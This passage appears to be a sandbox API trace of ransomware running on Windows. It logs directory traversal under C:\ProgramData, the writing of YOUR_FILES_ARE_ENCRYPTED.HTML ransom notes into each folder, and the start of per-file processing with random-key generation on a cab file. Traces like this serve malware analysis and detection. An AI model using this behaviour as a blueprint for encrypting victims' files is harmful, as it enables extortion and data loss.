(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\xboxlive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.187] WriteFile (in: hFile=0x30c, lpBuffer=0x313b008*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x313b008*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.188] CloseHandle (hObject=0x30c) returned 1 [0108.189] GetProcessHeap () returned 0x600000 [0108.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.189] GetProcessHeap () returned 0x600000 [0108.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0108.190] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="XboxLive", cAlternateFileName="")) returned 0 [0108.190] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.191] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0108.191] GetProcessHeap () returned 0x600000 [0108.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0108.191] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0108.193] WriteFile (in: hFile=0x300, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0108.195] CloseHandle (hObject=0x300) returned 1 [0108.195] GetProcessHeap () returned 0x600000 [0108.195] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0108.195] GetProcessHeap () returned 0x600000 [0108.195] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.197] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0108.197] StrStrIW (lpFirst="Microsoft OneDrive", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.197] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive") returned 37 [0108.197] GetProcessHeap () returned 0x600000 [0108.197] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0108.198] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft OneDrive" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive" [0108.198] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*" [0108.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0108.199] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0108.199] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="setup", cAlternateFileName="")) returned 1 [0108.199] StrStrIW (lpFirst="setup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.199] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup") returned 43 [0108.199] GetProcessHeap () returned 0x600000 [0108.199] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.200] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup" [0108.200] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*" [0108.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c94, dwReserved1=0x628c48, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0108.200] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c94, dwReserved1=0x628c48, cFileName="..", cAlternateFileName="")) returned 1 [0108.200] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c94, dwReserved1=0x628c48, cFileName="..", cAlternateFileName="")) returned 0 [0108.201] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0108.201] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0108.201] GetProcessHeap () returned 0x600000 [0108.201] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.201] WriteFile (in: hFile=0x30c, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.203] CloseHandle (hObject=0x30c) returned 1 [0108.203] GetProcessHeap () returned 0x600000 [0108.203] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.203] GetProcessHeap () returned 0x600000 [0108.203] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.204] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="setup", cAlternateFileName="")) returned 0 [0108.204] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0108.204] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0108.204] GetProcessHeap () returned 0x600000 [0108.204] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x313b008 [0108.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0108.205] WriteFile (in: hFile=0x300, lpBuffer=0x313b008*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x313b008*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0108.207] CloseHandle (hObject=0x300) returned 1 [0108.207] GetProcessHeap () returned 0x600000 [0108.207] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.207] GetProcessHeap () returned 0x600000 [0108.208] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0108.209] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6be8870b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0108.209] StrStrIW (lpFirst="Package Cache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.209] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache") returned 32 [0108.209] GetProcessHeap () returned 0x600000 [0108.209] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0108.210] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache") returned="\\\\?\\C:\\ProgramData\\Package Cache" [0108.210] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*" [0108.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6be8870b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0108.212] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6be8870b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0108.212] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", cAlternateFileName="{0FA68~1.285")) returned 1 [0108.212] StrStrIW (lpFirst="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.212] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned 83 [0108.212] GetProcessHeap () returned 0x600000 [0108.212] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.214] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" [0108.214] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*" [0108.214] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0108.214] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.214] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0108.214] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.214] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned 92 [0108.214] GetProcessHeap () returned 0x600000 [0108.214] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0108.215] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" [0108.215] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*" [0108.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0b80, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0108.215] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0b80, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0108.216] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x65089562, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x65089562, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0b80, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0108.216] StrStrIW (lpFirst="vcRuntimeAdditional_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.216] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned 116 [0108.216] GetProcessHeap () returned 0x600000 [0108.216] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0108.217] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" [0108.217] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*" [0108.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x65089562, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x65089562, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.217] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x65089562, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x65089562, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0108.217] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b027600, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x1b027600, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x1b027600, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x4f83ae, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0108.218] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.218] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0108.218] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.218] lstrlenW (lpString=".cab") returned 4 [0108.218] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.218] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0108.218] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0108.218] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=5211054) returned 1 [0108.218] GetProcessHeap () returned 0x600000 [0108.218] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0108.221] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="1F") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="73") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="53") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="B6") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="86") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="BB") returned 2 